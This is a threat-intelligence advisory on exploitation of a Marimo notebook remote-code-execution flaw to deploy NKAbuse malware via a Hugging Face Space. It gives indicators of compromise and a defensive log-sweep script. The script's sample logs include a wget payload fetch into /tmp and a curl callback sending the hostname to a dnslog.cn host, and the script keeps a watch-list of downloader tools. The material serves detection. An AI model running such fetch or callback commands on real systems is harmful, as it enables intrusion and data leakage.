Exploit of Marimo RCE Leads to NKAbuse Malware Deployment via Hugging Face

Severity: High (Score: 72.8)

Sources: BleepingComputer, www.sysdig.com

Summary

A critical vulnerability (CVE-2026-39987) in the Marimo Python notebook platform was disclosed on April 9, 2026, and was under active exploitation within hours. Attackers used this remote code execution flaw to deploy a new variant of the NKAbuse malware, hosted on a typosquatted Hugging Face Space. The Sysdig Threat Research Team recorded 662 exploit events between April 11 and 14, 2026, from 12 unique source IPs across 10 countries. The activity focuses on credential theft, with operators moving laterally to PostgreSQL and Redis databases. The malware operates as a remote access trojan and uses the NKN blockchain for command and control. Exploitation escalated rapidly after disclosure, so unpatched Marimo deployments should be treated as at significant risk. Security teams are advised to monitor for the indicators of compromise listed under Key Entities and to implement defenses against these tactics.

Key Points:

  • CVE-2026-39987 was disclosed on April 9, 2026, and exploited within hours.
  • Attackers deployed NKAbuse malware via a typosquatted Hugging Face Space.
  • 662 exploit events were recorded across 10 countries from April 11 to 14, 2026.

Key Entities

  • DDoS (attack_type)
  • Malware (attack_type)
  • Australia (country)
  • Germany (country)
  • Malaysia (country)
  • CVE-2017-5638 (cve)
  • CVE-2026-39987 (cve)
  • CWE-94 - Code Injection (cwe)
  • bskke4.dnslog.cn (domain)
  • dnslog.cn (domain)
  • hf.space (domain)
  • 111.90.145.139 (ipv4)
  • 203.10.98.186 (ipv4)
  • 38.147.173.172 (ipv4)
  • 92.208.115.60 (ipv4)
  • NKAbuse (malware)
  • bdcb5867f73beae89c3fce46ad5185be (md5)
  • T1003 - OS Credential Dumping (mitre_attack)
  • T1021 - Remote Services (mitre_attack)
  • T1053 - Scheduled Task/Job (mitre_attack)
  • T1059 - Command and Scripting Interpreter (mitre_attack)
  • T1071 - Application Layer Protocol (mitre_attack)
  • Hugging Face Spaces (platform)
  • Kubernetes (platform)
  • Linux (platform)
  • MacOS (platform)
  • 049c35fa746a8b86c100bf6b348ef6163b215898 (sha1)
  • 25e4b2c4bb37f125b693a9c57b0e743eab2a3d98234f7519cd389e788252fd13 (sha256)
  • Curl (tool)
  • Netcat (tool)
  • wget (tool)
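
The summary advises monitoring for the indicators above. The following is an added example of how to sweep log lines against exactly those indicators; it is not code from Sysdig, BleepingComputer or the Marimo project. The IPs, domains and hashes are copied from the Key Entities list; the log lines are constructed for the example, and the subdomain demo-space.hf.space is a hypothetical placeholder, not the typosquatted Space named in the reporting. Note the caveat built into the matcher: hf.space hosts every public Hugging Face Space and dnslog.cn is a shared out-of-band DNS service, so a bare-suffix match on either is a lead to investigate, not a verdict on its own; the exact IOC host and the listed hashes are stronger signals.

```python
"""IOC sweep over constructed sample log lines, using the indicators listed on this page."""
import re

# Indicators copied from the Key Entities list above.
IOC_IPS = {"111.90.145.139", "203.10.98.186", "38.147.173.172", "92.208.115.60"}
IOC_DOMAINS = {"bskke4.dnslog.cn", "dnslog.cn", "hf.space"}
IOC_HASHES = {
    "bdcb5867f73beae89c3fce46ad5185be",                                  # MD5
    "049c35fa746a8b86c100bf6b348ef6163b215898",                          # SHA-1
    "25e4b2c4bb37f125b693a9c57b0e743eab2a3d98234f7519cd389e788252fd13",  # SHA-256
}
# Tools the page lists as used for retrieval and callbacks.
DOWNLOADERS = ("curl", "wget", "netcat", "nc")

IP_RE = re.compile(r"(?<![\d.])(?:\d{1,3}\.){3}\d{1,3}(?![\d.])")
HOST_RE = re.compile(r"\b(?:[a-z0-9-]+\.)+[a-z]{2,}\b", re.IGNORECASE)
HASH_RE = re.compile(r"\b(?:[0-9a-f]{64}|[0-9a-f]{40}|[0-9a-f]{32})\b", re.IGNORECASE)
TOKEN_RE = re.compile(r"[A-Za-z]+")


def domain_matches(host: str) -> bool:
    """True for an IOC domain or any subdomain of it (bskke4.dnslog.cn hits dnslog.cn).

    Suffix matching requires the dot, so look-alikes such as evilhf.space do not match.
    """
    host = host.lower().rstrip(".")
    return any(host == d or host.endswith("." + d) for d in IOC_DOMAINS)


def scan_line(line: str) -> list[tuple[str, str]]:
    """Return (kind, value) hits for one log line; an empty list means no IOC seen."""
    hits: list[tuple[str, str]] = []
    for ip in IP_RE.findall(line):
        if ip in IOC_IPS:
            hits.append(("ip", ip))
    hosts = [h.lower() for h in HOST_RE.findall(line)]
    for host in hosts:
        if domain_matches(host):
            hits.append(("domain", host))
    for h in HASH_RE.findall(line):
        if h.lower() in IOC_HASHES:
            hits.append(("hash", h.lower()))
    # A curl/wget/netcat invocation that touches an IOC host is flagged separately:
    # that is the retrieval-and-callback pattern the summary describes.
    tools = {t.lower() for t in TOKEN_RE.findall(line)} & set(DOWNLOADERS)
    if tools and any(domain_matches(h) for h in hosts):
        hits.append(("downloader", sorted(tools)[0]))
    return hits


def scan_logs(lines: list[str]) -> dict[int, list[tuple[str, str]]]:
    """Map 1-based line number -> hits, for lines with at least one hit."""
    return {i: h for i, line in enumerate(lines, 1) if (h := scan_line(line))}


# Constructed sample lines (not real telemetry): an access-log entry from an IOC IP,
# a benign health check, a shell audit line fetching from a hypothetical Space,
# an out-of-band DNS callback, and an EDR quarantine line carrying the listed SHA-256.
SAMPLE_LOGS = [
    '203.10.98.186 - - [12/Apr/2026:03:14:07 +0000] "GET / HTTP/1.1" 200 1024',
    '10.0.0.5 - - [12/Apr/2026:03:14:09 +0000] "GET /healthz HTTP/1.1" 200 2',
    'Apr 12 03:14:11 nb-worker sh[2210]: wget -q -O /tmp/.x https://demo-space.hf.space/app',
    'Apr 12 03:15:02 nb-worker sh[2231]: curl -s http://bskke4.dnslog.cn/$(hostname)',
    'Apr 12 03:16:40 edr: quarantined /tmp/.x sha256=25e4b2c4bb37f125b693a9c57b0e743eab2a3d98234f7519cd389e788252fd13',
]

if __name__ == "__main__":
    for lineno, hits in scan_logs(SAMPLE_LOGS).items():
        print(f"line {lineno}: {hits}")
```

Feed the function your own access logs, shell audit records and EDR alerts line by line; treat a hash or exact-host hit as high confidence and a suffix-only hit on hf.space or dnslog.cn as a pivot point for further triage.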